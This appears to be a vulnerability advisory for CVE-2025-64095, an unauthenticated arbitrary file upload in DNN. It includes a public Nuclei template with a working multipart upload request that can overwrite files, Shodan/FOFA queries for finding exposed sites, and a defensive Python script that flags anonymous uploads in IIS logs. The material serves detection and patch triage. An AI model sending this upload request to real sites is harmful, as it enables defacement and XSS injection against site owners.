CVE-2025-64095: DNN - Unrestricted Arbitrary File Upload

Date: 2025-11-07 | Affected software: DNN | PoC: public

Vulnerability description

DNN (formerly DotNetNuke) < 10.1.1 contains an unrestricted file upload vulnerability: the default HTML editor provider allows unauthenticated file uploads and the overwriting of existing files. Unauthenticated attackers can use this to deface websites and inject XSS payloads. Exploitation requires no authentication.

PoC code [public]

id: CVE-2025-64095

info:
  name: DNN - Unrestricted Arbitrary File Upload
  author: DhiyaneshDk,pussycat0x
  severity: critical
  description: |
    DNN (formerly DotNetNuke) < 10.1.1 contains an unrestricted file upload vulnerability caused by the default HTML editor provider allowing unauthenticated file uploads and overwriting existing files, letting unauthenticated attackers deface websites and inject XSS payloads, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can upload and overwrite files, leading to website defacement and cross-site scripting attacks.
  remediation: |
    Update to version 10.1.1 or later.
  reference:
    - https://github.com/h4x0r-dz/CVE-2025-64095---DNN-Unauthenticated-arbitrary-file-upload
  metadata:
    verified: true
    max-request: 1
    vendor: dnnsoftware
    product: dotnetnuke
    shodan-query:
      - "Set-Cookie: dnn_IsMobile"
      - http.favicon.hash:-1465479343
    fofa-query:
      - app="dotnetnuke"
      - "Set-Cookie: dnn_IsMobile"
      - icon_hash="-1465479343"
  tags: cve,cve2025,intrusive,file-upload,dnn

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------7RKjWLYyrhvUn2AA31fJQ3

        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="file"; filename="{{filename}}.png"
        Content-Type: image/png

        {{randstr}}
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="storageFolderID"

        1
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="portalID"

        0
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="overrideFiles"

        1
        --------------------------7RKjWLYyrhvUn2AA31fJQ3
        Content-Disposition: form-data; name="mode"

        Default
        --------------------------7RKjWLYyrhvUn2AA31fJQ3--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"group"'
          - 'delete_type'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f26d1612a3a410c7f8a90974cda542d98c483dc7cd370266c59cba757fc547bd0220740f5f0e1ecb29684c80d0b661562ad641264bc3178375016e306c6679ed730c:922c64590222798bb761d5b6d8e72950
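
For triage on an unpatched site, the following added example (not part of the template or of DNN) scans IIS W3C logs for successful POSTs to the uploader path from clients that show no sign of a logged-in session. It assumes the `cs-username` and `cs(Cookie)` fields are enabled in IIS logging and that the forms-auth cookie uses DNN's default name `.DOTNETNUKE`; the log lines are constructed sample data.

```python
"""Flag anonymous POSTs to the DNNConnect.CKE uploader in IIS W3C logs."""
UPLOADER = "/providers/htmleditorproviders/dnnconnect.cke/browser/fileuploader.ashx"
AUTH_COOKIE = ".dotnetnuke"  # assumption: DNN's default forms-auth cookie name

# Constructed sample log, not real traffic (client IPs are documentation ranges).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-username c-ip cs(Cookie) sc-status
2025-11-07 10:01:02 GET /Default.aspx - 198.51.100.7 dnn_IsMobile=False 200
2025-11-07 10:01:09 POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx - 203.0.113.50 - 200
2025-11-07 10:02:30 POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx editor1 198.51.100.7 dnn_IsMobile=False;+.DOTNETNUKE=AAAA 200
2025-11-07 10:03:11 POST /providers/htmleditorproviders/dnnconnect.cke/browser/fileuploader.ashx - 203.0.113.50 dnn_IsMobile=False 401
"""

def parse_w3c(text):
    """Yield one dict per request, using the most recent #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated lines
                yield dict(zip(fields, values))

def anonymous_uploads(text):
    """Return (date, time, client IP) for accepted uploads with no auth signal."""
    hits = []
    for r in parse_w3c(text):
        if r.get("cs-method") != "POST":
            continue
        if r.get("cs-uri-stem", "").lower() != UPLOADER:  # IIS paths are case-insensitive
            continue
        if r.get("sc-status") != "200":  # the template also keys on a 200 response
            continue
        cookies = r.get("cs(Cookie)", "-").lower()
        has_auth = r.get("cs-username", "-") != "-" or (AUTH_COOKIE + "=") in cookies
        if not has_auth:
            hits.append((r["date"], r["time"], r["c-ip"]))
    return hits

if __name__ == "__main__":
    for date, time, ip in anonymous_uploads(SAMPLE_LOG):
        print(f"{date} {time} anonymous upload accepted from {ip}")
```

Each hit is a lead, not proof of compromise: compare the timestamp against file modification times in the portal's storage folders to see what was written or overwritten.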
